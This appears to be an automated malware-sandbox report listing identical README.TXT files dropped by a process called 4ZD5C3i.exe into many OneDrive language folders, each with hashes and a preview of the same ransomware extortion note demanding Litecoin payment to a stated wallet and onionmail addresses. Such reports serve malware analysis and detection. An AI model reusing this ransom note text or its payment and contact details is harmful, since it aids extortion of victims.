                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\is\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ja\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ka\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\kk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\km-KH\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\kn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ko\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\kok\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ku-Arab\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\lb-LU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\lt\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\lv\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\mi-NZ\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\mk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

